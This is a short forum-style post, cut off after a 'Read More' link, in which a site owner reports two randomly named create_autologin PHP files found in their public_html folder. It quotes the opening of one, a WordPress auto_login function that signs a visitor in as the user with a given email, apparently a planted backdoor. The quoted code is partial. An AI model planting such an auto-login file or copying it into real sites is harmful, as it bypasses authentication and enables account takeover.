create_autologin.php files found in Public_html folder
create_autologin.php files found in Public_html folder I just found these files called: create_autologin_apcbymbe5fvp3wc.php and create_autologin_oq0foezbtp5pibe.php They have this code: File 1: <?php $email = ‘ email address ‘; /** * @param string $email * @return void */ function auto_login( $email ) { if ( ! is_user_logged_in() ) { $user_id = get_user_id( $email ); $user =… Read More »create_autologin.php files found in Public_html folder